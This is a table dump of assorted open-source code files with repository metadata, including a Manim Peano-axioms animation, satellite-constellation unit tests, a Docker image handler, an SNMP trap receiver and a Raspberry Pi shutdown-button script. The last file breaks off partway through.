max_stars_repo_path (stringlengths 4-182) | max_stars_repo_name (stringlengths 6-116) | max_stars_count (int64 0-191k) | id (stringlengths 7-7) | content (stringlengths 100-10k) | size (int64 100-10k) |
---|---|---|---|---|---|
animations/peano_axioms.py | varunchodanker/ThreeAnimators | 2 | 2170174 |
from manim import *
# NEED TO RECONFIGURE FOR MANIMCE
class Peano(Scene):
CONFIG = {
"r": COLOR_MAP["RED_D"],
"g": COLOR_MAP["GREEN_D"],
"g2": COLOR_MAP["GREEN_E"],
"t": COLOR_MAP["TEAL_D"],
"b": COLOR_MAP["BLUE_D"],
"y_of_dots": 1.75 * DOWN,
"y_of_nums": 2.25 * DOWN,
"title_text": TextMobject("Peano Axioms"),
"axiom1_text": TextMobject("1. 0 is a natural number"),
"axiom2_first_temp_text": TextMobject("2. If n is a natural number..."),
"axiom2_first_text": TextMobject("2. If n is a natural number, "),
"axiom2_last_text": TextMobject("then n++ is a natural number"),
"axiom3_text": TextMobject("3. 0 is not the successor of any natural number"),
"axiom4_first_temp_text": TextMobject("4. If n, m are natural numbers and n ≠ m..."),
"axiom4_first_text": TextMobject("4. If n, m are natural numbers and n ≠ m,"),
"axiom4_second_text": TextMobject("then n++ ≠ m++"),
"axiom4_third_temp_text": TextMobject("equivalently, if n++ = m++..."),
"axiom4_third_text": TextMobject("equivalently, if n++ = m++,"),
"axiom4_fourth_text": TextMobject("then n = m"),
"axiom4_final_text": TextMobject("4. Different natural numbers must have different successors"),
"zero_dot": Dot(),
"zero_num": TextMobject("0"),
"n_dot": Dot(),
"n_num": TextMobject("n"),
"succ_n_dot": Dot(),
"succ_n_num": TextMobject("n++"),
"m_dot": Dot(),
"m_num": TextMobject("m"),
"succ_m_dot": Dot(),
"succ_m_num": TextMobject("m++"),
}
def construct(self):
# grid = ImageMobject('tools/grid.png').scale(4)
# self.add(grid)
# self.intro()
self.axiom1()
self.axiom2()
self.axiom3()
# self.axiom4()
# self.axiom5()
def intro(self):
# Peano Axioms Title
self.play(Write(self.title_text))
self.wait(0.7)
self.play(FadeOut(self.title_text))
self.wait(0.5)
def axiom1(self):
# Add dot representing 0
self.play(
Write(self.zero_dot),
run_time=0.5
)
self.wait(0.2)
# Add text representing 0
self.zero_num.move_to(self.y_of_nums)
self.play(
Write(self.zero_num),
run_time=0.3
)
# Move zero dot down to zero text
self.zero_dot.generate_target()
self.zero_dot.target.move_to(self.y_of_dots)
self.play(
MoveToTarget(self.zero_dot),
run_time=1
)
self.wait(0.7)
# Add axiom text
self.play(Write(self.axiom1_text))
self.wait(1)
# Move axiom text to top left
self.axiom1_text.generate_target()
self.axiom1_text.target.scale(0.75).move_to(6.5 * LEFT + 3.3 * UP,
aligned_edge=UP + LEFT).set_color(self.b)
self.play(
MoveToTarget(self.axiom1_text),
run_time=1.65
)
self.wait(1)
def axiom2(self):
# x pos of n dot and n num
x_of_n = 2 * RIGHT
# Add dot representing n
self.n_dot.move_to(x_of_n).set_color(self.g)
self.play(
Write(self.n_dot),
run_time=0.5
)
self.wait(0.2)
# Add text representing n
self.n_num.move_to(x_of_n + self.y_of_nums).set_color(self.g)
self.play(
Write(self.n_num),
run_time=0.3
)
# Move n dot down to text
self.n_dot.generate_target()
self.n_dot.target.move_to(x_of_n + self.y_of_dots)
self.play(
MoveToTarget(self.n_dot),
run_time=1
)
self.wait(0.7)
# Add first part of axiom text
self.play(Write(self.axiom2_first_temp_text))
self.wait(0.5)
# Move axiom text to top left
self.play(
ReplacementTransform(
self.axiom2_first_temp_text,
self.axiom2_first_text.scale(0.75).next_to(self.axiom1_text, DOWN, aligned_edge=LEFT)
.set_color(self.b)
)
)
self.wait(0.5)
x_of_succ_n = 3.5 * RIGHT
# Add dot representing n++
self.succ_n_dot.move_to(x_of_succ_n).set_color(self.t)
self.play(
Write(self.succ_n_dot),
run_time=0.5
)
self.wait(0.2)
# Add text representing n
self.succ_n_num.move_to(x_of_succ_n + self.y_of_nums).set_color(self.t)
self.play(
Write(self.succ_n_num),
run_time=0.3
)
# Move n dot down to text
self.succ_n_dot.generate_target()
self.succ_n_dot.target.move_to(x_of_succ_n + self.y_of_dots)
self.play(
MoveToTarget(self.succ_n_dot),
run_time=1
)
self.wait(0.7)
# Add second part of axiom text
self.play(Write(self.axiom2_last_text))
self.wait(0.7)
# Move axiom text to top left
self.axiom2_last_text.generate_target()
self.axiom2_last_text.target.scale(0.75).next_to(self.axiom2_first_text, DOWN, buff=0.1, aligned_edge=LEFT) \
.set_color(self.b)
self.play(
MoveToTarget(self.axiom2_last_text),
run_time=1
)
self.wait(1)
def axiom3(self):
axiom3_motivations = TextMobject("Though right now, n++ can be anywhere...")
self.play(Write(axiom3_motivations))
self.wait(0.5)
succ_n = VGroup(self.succ_n_dot, self.succ_n_num)
succ_n.generate_target()
succ_n.target.shift(8 * LEFT)
self.play(
MoveToTarget(succ_n),
FadeOut(axiom3_motivations),
run_time=2
)
self.wait(0.5)
succ_n.generate_target()
succ_n.target.shift(5.5 * RIGHT)
self.play(MoveToTarget(succ_n), run_time=2)
self.wait(0.5)
succ_n.generate_target()
succ_n.target.shift(3.5 * RIGHT)
self.play(MoveToTarget(succ_n), run_time=2)
self.wait(0.5)
axiom3_motivations = TextMobject("...meaning it can be on zero!")
self.play(Write(axiom3_motivations))
self.wait(1)
succ_n.generate_target()
succ_n.target.shift(4.5*LEFT).set_color(self.r)
self.play(
MoveToTarget(succ_n),
FadeOut(self.zero_num),
run_time=2
)
self.wait(1)
axiom3_motivations.generate_target()
axiom3_motivations_1 = TextMobject("This shouldn't be allowed,")
axiom3_motivations_2 = TextMobject("leading us to the third axiom...").next_to(axiom3_motivations_1, DOWN)
axiom3_motivations.target = VGroup(axiom3_motivations_1, axiom3_motivations_2)
self.play(MoveToTarget(axiom3_motivations))
self.wait(3.5)
self.play(ReplacementTransform(axiom3_motivations, self.axiom3_text))
succ_n.generate_target()
succ_n.target.shift(3.5 * RIGHT).set_color(self.t)
self.play(
MoveToTarget(succ_n),
Write(self.zero_num),
run_time=2
)
self.wait(1)
self.axiom3_text.generate_target()
axiom3_text_1 = TextMobject("3. 0 is not the successor of")
axiom3_text_2 = TextMobject("any natural number").next_to(axiom3_text_1, DOWN, buff=0.1, aligned_edge=LEFT)
self.axiom3_text.target = VGroup(axiom3_text_1, axiom3_text_2)\
.scale(0.75)\
.next_to(self.axiom2_last_text, DOWN, aligned_edge=LEFT)\
.set_color(self.b)
self.play(
MoveToTarget(self.axiom3_text),
run_time=1
)
def axiom4(self):
pass
def axiom5(self):
pass
| 7,908 |
app/src/consts/CONSTS.py | parsariyahi/pars_messenger | 0 | 2169024 |
DBMS='mysql'
DB_HOST='localhost'
DB_NAME='pars_messenger'
DB_USER='prrh'
DB_PASSWORD='<PASSWORD>'
"""
:pattern <dbms>://<username>:<password>@host/<database name>
"""
SQLALCHEMY_DATABASE_URI=f"{DBMS}://{DB_USER}:{DB_PASSWORD}@{DB_HOST}/{DB_NAME}"
SECRET_KEY = '<KEY>'
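# Illustrative only (not part of the original config): a Flask app would
# typically consume these constants roughly like this, assuming Flask and
# Flask-SQLAlchemy are installed and this module is importable as
# `app.src.consts.CONSTS`.
#
#   from flask import Flask
#   from flask_sqlalchemy import SQLAlchemy
#   from app.src.consts import CONSTS
#
#   flask_app = Flask(__name__)
#   flask_app.config["SQLALCHEMY_DATABASE_URI"] = CONSTS.SQLALCHEMY_DATABASE_URI
#   flask_app.config["SECRET_KEY"] = CONSTS.SECRET_KEY
#   db = SQLAlchemy(flask_app)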
| 268 |
clean.py | peterwilliams97/blank | 0 | 2167749 |
"""
PDF to text conversion
"""
import string
import re
from ngrams import Pw
RE_SPACE = re.compile(r'[\t ]+', re.MULTILINE | re.DOTALL)
punctuation = string.punctuation
punctuation = punctuation.replace("-", "") # don't remove hyphens
RE_BREAK = re.compile(r'(\w+)-([\n\f\r]+)(\w+)([%s]*)\s*' % punctuation,
re.MULTILINE | re.DOTALL)
hyphenated = set()
def unbreak(m):
global hyphenated
w00 = m.group(0)
w0 = m.group(1) + '-' + m.group(2) + m.group(3)
w1 = m.group(1) + '-' + m.group(3)
w2 = m.group(1) + m.group(3)
w1n = w1 + m.group(4) + '\n'
w2n = w2 + m.group(4) + '\n'
p0 = Pw(w0)
p1 = Pw(w1)
    p2 = Pw(w2)
if p1 < 1e-32 and p2 < 1e-34:
p1a = Pw(m.group(1)) * Pw(m.group(3))
if p1a > 1e-27:
p1 = p1a
probs = [(p, i) for i, p in enumerate([p0, p1, p2])]
words = [w00, w1n, w2n]
_, best = max(probs)
# assert m.group(1) != 'indi' or words[best] == 'individual\n', '"%s" %s %s %s "%s"' % (
# m.group(0), m.groups(), [p0, p1, p2],
# best, words[best])
if best != 2:
hyphenated.add((w1, w2))
return words[best]
def dehyphenate(text):
"""
The businesses around newspapers, books, and mag-
azines are changing on a daily basis; even still, global electronic com-
munication over the Internet
=>
The businesses around newspapers, books, and magazines
are changing on a daily basis; even still, global electronic communication
over the Internet
"""
assert isinstance(text, str), type(text)
# print([type(x) for x in (text, RE_BREAK, unbreak)])
unbroke = RE_BREAK.sub(unbreak, text)
return unbroke
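# A minimal sketch of how dehyphenate() is meant to be driven (my assumption:
# `ngrams.Pw` is a word-probability function trained on a reference corpus, and
# the input is the raw text extracted from a PDF):
#
#   with open("page.txt", encoding="utf-8") as f:
#       raw = f.read()
#   fixed = dehyphenate(raw)     # e.g. "mag-\nazines" becomes "magazines\n"
#   print(sorted(hyphenated))    # (hyphenated, joined) pairs where the hyphen was kept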
| 1,763 |
tests/tests.py | samsipe/SatelliteConstellationCreator | 7 | 2169475 |
from __init__ import add_parent_directory # Needed for running tests in pipelines
if __name__ == "__main__":
add_parent_directory() # This must stay prior to the satellite_constellation imports
from satellite_constellation.Constellation import *
from satellite_constellation.SceneCreator import *
import unittest
import math
class TestConstellationCreator(unittest.TestCase): # Test for errors in the constellation creator
def test_0_constellations(self): # Check for number error with 0 constellations
constellation_num = 0
T, P, F = 1, 1, 1
with self.assertRaises(ConstellationNumberError) as error:
constellation = constellation_creator(constellation_num, [T], [P], [F], [30], [1000], [0.5], [20])
def test_constellation_mismatch(self): # Check for mismatch error catching with an empty satellite nums list
constellation_num = 1
T, P, F = [18, 18], [3, 3], [1, 1]
satellite_nums = [T]
with self.assertRaises(ConstellationConfigurationError) as error:
constellation = constellation_creator(constellation_num, T, P, F, [30], [1000], [0.5], [20])
def test_plane_mismatch(
self): # Check for mismatch error if the satellites cannot be evenly spread across the planes
T, P, F = 1, 2, 1
plane_nums = [P]
satellite_nums = [T]
with self.assertRaises(ConstellationPlaneMismatchError):
constellation = constellation_creator(1, satellite_nums, plane_nums, [F], [30], [1000], [0.5], [20])
def test_phasing(self):
        T, P, F = 18, 3, 3 # This would put the satellites right on top of each other
with self.assertRaises(PhaseError):
constellation = constellation_creator(1, [T], [P], [F], [30], [1000], [0.5], [20])
        T, P, F = 18, 3, 6 # This would also put the satellites right on top of each other
with self.assertRaises(PhaseError):
constellation = constellation_creator(1, [T], [P], [F], [30], [1000], [0.5], [20])
def test_inclination(self):
T, P, F = 2, 2, 1
inclination = 100
with self.assertRaises(InclinationError):
constellation = constellation_creator(1, [T], [P], [F], [inclination], [1000], [0.5], [20])
def test_altitude(self):
T, P, F = 2, 2, 1
altitude = -1
with self.assertRaises(AltitudeError):
constellation = constellation_creator(1, [T], [P], [F], [30], [altitude], [0.5], [20])
altitude = 50
with self.assertRaises(AltitudeError):
constellation = constellation_creator(1, [T], [P], [F], [30], [altitude], [0.5], [20])
def test_eccentricity(self):
T, P, F = 2, 2, 1
eccentricity = -1
with self.assertRaises(EccentricityError):
constellation = constellation_creator(1, [T], [P], [F], [30], [1000], [eccentricity], [20])
eccentricity = 2
with self.assertRaises(EccentricityError):
constellation = constellation_creator(1, [T], [P], [F], [30], [1000], [eccentricity], [20])
def test_beam_width(self):
T, P, F = 2, 2, 1
beam_width = 190
with self.assertRaises(BeamError): # Beam width > 180
constellation = constellation_creator(1, [T], [P], [F], [30], [1000], [0.5], [beam_width])
T, P, F = 2, 2, 1
beam_width = 0
with self.assertRaises(BeamError): # Beam width = 0
constellation = constellation_creator(1, [T], [P], [F], [30], [1000], [0.5], [beam_width])
class TestSatellite(unittest.TestCase):
def setUp(self):
self.satellite = Satellite("testSat", 1000, 0, 10, 20, 30, 40, 30, rads=False)
def test_true_altitude(self):
self.assertEqual(self.satellite.true_alt, 7371)
def test_deg_to_rad(self):
self.assertAlmostEqual(0.1745, self.satellite.inclination_r, 4)
self.assertAlmostEqual(0.3491, self.satellite.right_ascension_r, 4)
self.assertAlmostEqual(0.5236, self.satellite.perigee_r, 4)
self.assertAlmostEqual(0.6981, self.satellite.ta_r, 4)
def test_rad_to_degree(self):
rad_sat = Satellite("testSat", 1000, 0, math.pi / 5, math.pi / 4, math.pi / 3, math.pi / 2, math.pi / 5,
rads=True)
self.assertAlmostEqual(36, rad_sat.inclination, 4)
self.assertAlmostEqual(45, rad_sat.right_ascension, 4)
self.assertAlmostEqual(60, rad_sat.perigee, 4)
self.assertAlmostEqual(90, rad_sat.ta, 4)
class TestWalker(unittest.TestCase):
def setUp(self):
self.walker_constellation = WalkerConstellation(18, 3, 1, 30, 1000, 0, 20)
def test_sats_per_plane(self):
self.assertEqual(6, self.walker_constellation.sats_per_plane)
def test_phasing(self):
self.assertEqual(20, self.walker_constellation.correct_phasing)
class TestStreets(unittest.TestCase):
def setUp(self):
self.streets_constellation = SOCConstellation(1, 10, 1500, 60, [20], 0.8, 100)
def test_perigee(self):
self.assertAlmostEqual(self.streets_constellation.perigee, 7871, 3)
def test_semi_major(self):
self.assertAlmostEqual(self.streets_constellation.semi_major, 39355, 3)
def test_orbital_period(self):
self.assertAlmostEqual(self.streets_constellation.orbital_period, 77700.55, 1)
def test_earth_radial_coverage(self):
self.assertAlmostEqual(self.streets_constellation.earth_coverage_radius, 868.7, 1)
def test_earth_angular_coverage(self):
self.assertAlmostEqual(self.streets_constellation.earth_coverage_angle, 0.136, 3)
def test_required_satellites_by_coverage(self):
self.assertAlmostEqual(self.streets_constellation.num_satellites, 30)
def test_required_satellites_by_period(self):
streets_constellation = SOCConstellation(1, 10, 1500, 60, [20], 0.8, 7770)
self.assertAlmostEqual(streets_constellation.num_satellites, 10, 1)
class TestFlower(unittest.TestCase):
# Test cases from "The Flower Constellations - Theory, Design Process and Applications" - Wilkins, P.M
def setUp(self):
self.flower_suite = [FlowerConstellation(8, 1, 9, 1, 9, 0, 0, 2500, 0),
FlowerConstellation(769, 257, 4, 1, 4, 0, 0, 600, 0),
FlowerConstellation(4, 1, 4, 1, 4, 0, 0, 600, 0),
FlowerConstellation(3, 1, 4, 1, 4, 0, 0, 600, 0),
FlowerConstellation(3, 1, 4, 1, 7, 0, 0, 600, 0),
FlowerConstellation(3, 1, 4, 1, 2, 0, 0, 600, 0),
FlowerConstellation(3, 2, 4, 1, 2, 0, 0, 600, 0),
FlowerConstellation(31, 11, 30, 7, 10, 0, 0, 9000, 0),
FlowerConstellation(37, 18, 57, 6, 19, 0, 0, 19702, 0),
FlowerConstellation(15, 7, 49, 23, 49, 0, 0, 19702, 0)]
def test_num_satellites(self):
num_sats = []
num_sats_test = [9, 4, 4, 4, 4, 2, 4, 30, 57, 49]
for idx in range(len(self.flower_suite)):
num_sats.append(self.flower_suite[idx].num_satellites)
self.assertEqual(num_sats, num_sats_test)
def test_max_satellites(self):
max_sats = []
max_sats_test = [9, 1028, 4, 4, 7, 2, 4, 110, 342, 343]
for idx in range(len(self.flower_suite)):
max_sats.append(self.flower_suite[idx].max_sats)
self.assertEqual(max_sats, max_sats_test)
def test_max_sats_per_orbit(self):
max_sats_per_orbit = []
max_sats_per_orbit_test = [1, 257, 1, 1, 1, 1, 2, 11, 18, 7]
for idx in range(len(self.flower_suite)):
max_sats_per_orbit.append(self.flower_suite[idx].max_sats_per_orbit)
self.assertEqual(max_sats_per_orbit, max_sats_per_orbit_test)
def test_raan_spacing(self):
raan_spacing_test = [-40, -90, -90, -90, -51.42, -180, -180, -252, -113.68, -168.97]
for idx in range(len(self.flower_suite)):
self.assertAlmostEqual(raan_spacing_test[idx], self.flower_suite[idx].raan_spacing, delta=0.1)
def test_mean_anomaly_spacing(self):
mean_anomaly_spacing_test = [320, 269.2, 360, 270, 154.28, 180, 270, 350.18, 233.68, 2.099]
for idx in range(len(self.flower_suite)):
self.assertAlmostEqual(mean_anomaly_spacing_test[idx], self.flower_suite[idx].mean_anomaly_spacing,
delta=0.1)
def test_raan_anomaly_simple(self):
param_list = []
param_list_test = [[0, 0], [40, 40], [80, 80], [120, 120], [160, 160], [200, 200], [240, 240], [280, 280],
[320, 320]]
for idx in range(len(self.flower_suite[0].raan)):
param_list.append([self.flower_suite[0].raan[idx], self.flower_suite[0].mean_anomaly[idx]])
self.assertTrue(len(param_list) == len(param_list_test))
for idx in range(len(param_list)):
self.assertTrue(param_list_test[idx] in param_list)
def test_raan_anomaly_complex(self):
param_list = []
param_list_test = [[0, 0], [0, 180], [180, 90], [180, 270]]
for idx in range(len(self.flower_suite[6].raan)):
param_list.append([self.flower_suite[6].raan[idx], self.flower_suite[6].mean_anomaly[idx]])
for idx in range(len(param_list)):
self.assertTrue(param_list_test[idx] in param_list)
if __name__ == '__main__':
unittest.main()
| 9,487 |
shutdown.py | radiodee1/awesome-chatbot | 22 | 2169601 |
#!/usr/bin/python
try:
import RPi.GPIO as GPIO
except:
try:
import Jetson.GPIO as GPIO
except:
exit()
pass
import time
import subprocess
# we will use the pin numbering to match the pins on the Pi, instead of the
# GPIO pin outs (makes it easier to keep track of things)
GPIO.setmode(GPIO.BOARD)
# use the same pin that is used for the reset button (one button to rule them all!)
GPIO.setup(5, GPIO.IN, pull_up_down=GPIO.PUD_UP)
oldButtonState1 = True
while True:
# grab the current button state
buttonState1 = GPIO.input(5)
# check to see if button has been pushed
if buttonState1 != oldButtonState1 and buttonState1 == False:
subprocess.call("shutdown -h now", shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
oldButtonState1 = buttonState1
time.sleep(.1)
| 875 |
test/utils/vcf2vars.py | gantzgraf/vape | 4 | 2170147 |
#!/usr/bin/env python3
import pysam
import sys
if __name__ == '__main__':
if len(sys.argv) > 2:
sys.exit("Usage: {} [in.vcf]".format(sys.argv[0]))
if len(sys.argv) > 1:
vcf = pysam.VariantFile(sys.argv[1])
else:
vcf = pysam.VariantFile('-')
pos_offset = 1000000
for record in vcf:
print("{}:{}-{}/{}".format(record.chrom,
record.pos,
record.ref,
','.join(record.alts)))
vcf.close()
| 544 |
app/auth/email.py | karomag/microblog | 0 | 2169477 |
# -*- coding:utf-8 -*-
"""Email module."""
from flask import current_app, render_template
from flask_babel import _
from app.email import send_email
def send_password_reset_email(user):
"""Generates the password reset email.
Args:
user: User.
"""
token = user.get_reset_password_token()
send_email(
_('[Microblog] Reset Your Password'),
sender=current_app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template(
'email/reset_password.txt',
user=user,
token=token,
),
html_body=render_template(
'email/reset_password.html',
user=user,
token=token,
),
)
| 735 |
ecranner/docker.py | homoluctus/ecranner | 6 | 2162942 |
import docker
from docker.errors import ImageNotFound, APIError
from .log import get_logger
from .exceptions import LoginRegistryError, ImageMismatchError
logger = get_logger()
class DockerImageHandler:
UNIX_SOCKET = 'unix:///var/run/docker.sock'
def __init__(self, base_url=None, timeout=60):
base_url = base_url or self.UNIX_SOCKET
self.docker_client = docker.DockerClient(
base_url=base_url,
version='auto',
timeout=timeout,
)
def __enter__(self):
return self
def __exit__(self, *exc):
self.close()
def close(self):
self.docker_client.close()
def pull(self, image_name, all_tags=False, username=None, password=<PASSWORD>):
"""Pull a Docker image
Args:
image_name (str): Docker image name included tag to pull
all_tags (boolean): Whether all image tags are pulled
when no tag is specified.
The image of `latest` tag is pulled if all is False.
username (str)
password (<PASSWORD>)
Returns:
image (list): in case, no tag is specified and all_tags is True
pulled_image_name (str): a docker image name pulled the registry
Raises:
docker.errors.APIError
ImageMismatchError
"""
# pre check if specified docker image is already pulled
try:
result = self.exists(image_name)
if result:
return image_name
except APIError:
result = False
auth_config = {}
if username and password:
auth_config = {'username': username, 'password': password}
if not self.tag_exists(image_name) and not all_tags:
            image_name = self.add_tag(image_name)
try:
image = self.docker_client.images.pull(
image_name,
auth_config=auth_config
)
except APIError as err:
raise err
if isinstance(image, list):
return image
pulled_image_name = image.tags[0]
if pulled_image_name != image_name:
raise ImageMismatchError(f'''
Pulled image: {pulled_image_name}
Expected: {image_name}
''')
logger.info(f'Pulled {image_name}')
return pulled_image_name
def remove(self, image_name, force=False):
"""Remove image pulled in local machine
Args:
image_name (str)
force (boolean)
Returns:
boolean
"""
if not isinstance(image_name, str):
raise TypeError(f'Expected str object, \
but {image_name} is {type(image_name)} object')
if not self.exists(image_name):
return True
res = self.docker_client.images.remove(image_name, force=force)
logger.debug(f'Response from Docker Engine: {res}')
# Check again if specified docker image exists
if self.exists(image_name):
return False
return True
def remove_images(self, images, force=False):
"""Remove docker images pulled in local
Args:
images (list): pulled docker images
force (boolean): force to remove
Returns:
True: succeed to remove all images
failed_images (list)
"""
failed_images = []
for image in images:
result = self.remove(image, force)
if not result:
failed_images.append(image)
return True if not failed_images else failed_images
def exists(self, image_name):
"""Make sure if specified docker image exists in local
Args:
image_name (str)
Returns:
boolean
Raises:
docker.errors.APIError
"""
if not isinstance(image_name, str):
raise TypeError(f'Expected str object, \
but argument is {type(image_name)} object')
try:
self.docker_client.images.get(image_name)
except ImageNotFound:
return False
except APIError as err:
raise err
else:
logger.debug(f'Found {repr(image_name)} Docker image')
return True
def login(self, username, password, registry, reauth=False):
"""Login to a registry
Args:
username (str)
password (<PASSWORD>)
registry (str)
reauth (boolean)
Returns:
True
Raises:
LoginRegistryError
docker.errors.APIError
"""
try:
res = self.docker_client.login(
username=username,
password=password,
registry=registry,
reauth=reauth
)
except APIError as err:
raise LoginRegistryError(f'Failed to Login to ECR: {err}')
else:
logger.debug(res)
return True
def tag_exists(self, image_name):
"""Checks if image_name contains tag
Args:
image_name (str)
Returns:
boolean
"""
tag_prefix = ':'
if tag_prefix in image_name \
and not image_name.endswith(tag_prefix):
return True
return False
def add_tag(self, image_name, tag='latest'):
"""Add a tag to image name
Args:
image_name (str)
tag (str)
Returns:
image_name
"""
if image_name.endswith(':'):
image_name += tag
else:
image_name += f':{tag}'
return image_name
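# Sketch of typical usage (mine, not taken from the project; the image name,
# registry and credentials below are placeholders):
#
#   with DockerImageHandler() as handler:
#       handler.login("user", "secret", "registry.example.com")
#       name = handler.pull("registry.example.com/app:1.0")
#       # ... scan the pulled image ...
#       handler.remove(name, force=True)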
| 5,797 |
dolphin/alert_manager/trap_receiver.py | ThisIsClark/dolphin | 0 | 2169460 |
# Copyright 2020 The SODA Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from oslo_log import log
from pysnmp.carrier.asyncore.dgram import udp
from pysnmp.entity import engine, config
from pysnmp.entity.rfc3413 import ntfrcv
from pysnmp.proto.api import v2c
from pysnmp.smi import builder, view, rfc1902
from dolphin import exception
from dolphin.alert_manager import alert_processor
from dolphin.alert_manager import constants
LOG = log.getLogger(__name__)
# Currently a static MIB file list is loaded.
# The mechanism is to be changed to load all MIB files.
MIB_LOAD_LIST = ['SNMPv2-MIB','IF_MIB']
class TrapReceiver(object):
"""Trap listening and processing functions"""
def __init__(self, trap_receiver_address, trap_receiver_port,
snmp_mib_path, mib_view_controller=None, snmp_engine=None):
self.mib_view_controller = mib_view_controller
self.snmp_engine = snmp_engine
self.trap_receiver_address = trap_receiver_address
self.trap_receiver_port = trap_receiver_port
self.snmp_mib_path = snmp_mib_path
def _mib_builder(self):
"""Loads given set of mib files from given path."""
mib_builder = builder.MibBuilder()
try:
self.mib_view_controller = view.MibViewController(mib_builder)
# set mib path to mib_builder object and load mibs
mib_path = builder.DirMibSource(self.snmp_mib_path),
mib_builder.setMibSources(*mib_path)
if len(MIB_LOAD_LIST) > 0:
mib_builder.loadModules(*MIB_LOAD_LIST)
except Exception:
raise ValueError("Mib load failed.")
def _add_transport(self):
"""Configures the transport parameters for the snmp engine."""
try:
config.addTransport(
self.snmp_engine,
udp.domainName,
udp.UdpTransport().openServerMode(
(self.trap_receiver_address, int(self.trap_receiver_port)))
)
except Exception:
raise ValueError("Port binding failed the provided port is in use.")
@staticmethod
def _extract_oid_value(var_bind):
"""Extracts oid and value from var binds.
ex: varbind = (SNMPv2-MIB::snmpTrapOID.0 = SNMPv2-MIB::coldStart)
oid = snmpTrapOID
val = coldStart
"""
# Separate out oid and value strings
var_bind_info = var_bind.prettyPrint()
var_bind_info = var_bind_info.split("=", 1)
oid = var_bind_info[0]
val = var_bind_info[1]
# Extract oid from oid string
# Example: get snmpTrapOID from SNMPv2-MIB::snmpTrapOID.0
oid = re.split('[::.]', oid)[2]
# Value can contain mib name also, if so, extract value from it
# Ex: get coldStart from SNMPv2-MIB::coldStart
if "::" in val:
val = re.split('[::]', val)[2]
val = val.strip()
return oid, val
def _cb_fun(self, state_reference, context_engine_id, context_name,
var_binds, cb_ctx):
"""Callback function to process the incoming trap."""
exec_context = self.snmp_engine.observer.getExecutionContext(
'rfc3412.receiveMessage:request')
LOG.info('#Notification from %s \n#ContextEngineId: "%s" '
'\n#ContextName: ''"%s" \n#SNMPVER "%s" \n#SecurityName "%s" '
% (
'@'.join(
[str(x) for x in exec_context['transportAddress']]),
context_engine_id.prettyPrint(),
context_name.prettyPrint(), exec_context['securityModel'],
exec_context['securityName']))
var_binds = [rfc1902.ObjectType(rfc1902.ObjectIdentity(x[0]), x[1])
.resolveWithMib(self.mib_view_controller)
for x in var_binds]
alert = {}
for var_bind in var_binds:
oid, value = self._extract_oid_value(var_bind)
alert[oid] = value
# Fill additional info to alert_info
# transportAddress contains both ip and port, extract ip address
alert['transport_address'] = exec_context['transportAddress'][0]
# Handover trap info to alert processor for model translation and export
try:
alert_processor.AlertProcessor().process_alert_info(alert)
except (exception.AccessInfoNotFound,
exception.StorageNotFound,
exception.InvalidResults) as e:
# Log and end the trap processing error flow
LOG.error(e)
except Exception as e:
# Unexpected exception occurred
LOG.error(e)
def _snmp_v2v3_config(self):
"""Configures snmp v2 and v3 user parameters."""
community_str = constants.SNMP_COMMUNITY_STR
config.addV1System(self.snmp_engine, community_str, community_str)
auth_priv_protocols = {
'usmHMACMD5AuthProtocol': config.usmHMACMD5AuthProtocol,
'usmHMACSHAAuthProtocol': config.usmHMACSHAAuthProtocol,
'usmAesCfb128Protocol': config.usmAesCfb128Protocol,
'usmAesCfb256Protocol': config.usmAesCfb256Protocol,
'usmAesCfb192Protocol': config.usmAesCfb192Protocol,
'usmDESPrivProtocol': config.usmDESPrivProtocol,
'usmNoAuthProtocol': config.usmNoAuthProtocol,
'usmNoPrivProtocol': config.usmNoPrivProtocol
}
config.addV3User(
self.snmp_engine, userName=constants.SNMP_USM_USER,
authKey=constants.SNMP_V3_AUTHKEY,
privKey=constants.SNMP_V3_PRIVKEY,
authProtocol=auth_priv_protocols.get(
constants.SNMP_V3_AUTH_PROTOCOL, config.usmNoAuthProtocol),
privProtocol=auth_priv_protocols.get(
constants.SNMP_V3_PRIV_PROTOCOL, config.usmNoPrivProtocol),
securityEngineId=v2c.OctetString(
hexValue=constants.SNMP_ENGINE_ID))
return
def start(self):
"""Starts the snmp trap receiver with necessary prerequisites."""
snmp_engine = engine.SnmpEngine()
self.snmp_engine = snmp_engine
try:
# Load all the mibs and do snmp config
self._mib_builder()
self._snmp_v2v3_config()
# Register callback for notification receiver
ntfrcv.NotificationReceiver(snmp_engine, self._cb_fun)
# Add transport info(ip, port) and start the listener
self._add_transport()
snmp_engine.transportDispatcher.jobStarted(
constants.SNMP_DISPATCHER_JOB_ID)
except Exception:
raise ValueError("Failed to setup for trap listener.")
try:
LOG.info("Starting trap receiver.")
snmp_engine.transportDispatcher.runDispatcher()
except Exception:
snmp_engine.transportDispatcher.closeDispatcher()
raise ValueError("Failed to start trap listener.")
def stop(self):
"""Brings down the snmp trap receiver."""
# Go ahead with shutdown, ignore if any errors happening during the
# process as it is shutdown
if self.snmp_engine:
self.snmp_engine.transportDispatcher.closeDispatcher()
LOG.info("Trap receiver stopped.")
| 7,870 |
__init__.py | OliWright/mqtt_fishtank_lights | 0 | 2169495 |
from .celestial import CelestialController
from .colour_tables import RgbWW
from .colour_tables import ColourTable
from .fishtank_lights import LegacyFishtankLights
from .fishtank_lights import FishtankLights
| 214 |
main.py | mattianeroni/2DBinPacking | 0 | 2169678 |
import packing
import utils
from packing import test
import itertools
orderlines = utils.read_problem("./testproblem.csv")
cases = tuple(itertools.chain(
orderlines[0].cases,
orderlines[1].cases,
orderlines[2].cases,
orderlines[3].cases,
orderlines[6].cases,
))
test(packing.MRBL, cases, (120,80))
test(packing.GBAF, cases, (120,80), splitting="shorteraxis")
test(packing.SWWF, cases, (120,80))
| 420 |
yukicoder/yuki202.py | knuu/competitive-programming | 1 | 2169116 |
from math import hypot
N = int(input())
def isOverlap(x1, y1, x2, y2, r=10):
return hypot(x1-x2, y1-y2) < r * 2
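# check() below uses a uniform grid as a spatial hash: buckets are 20 units
# wide (one circle diameter, since r = 10), so a new circle can only overlap
# circles whose centres fall in the same bucket or one of its 8 neighbours.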
def check(x, y):
near = [(-1, -1), (0, -1), (1, -1),
(-1, 0), (0, 0), (1, 0),
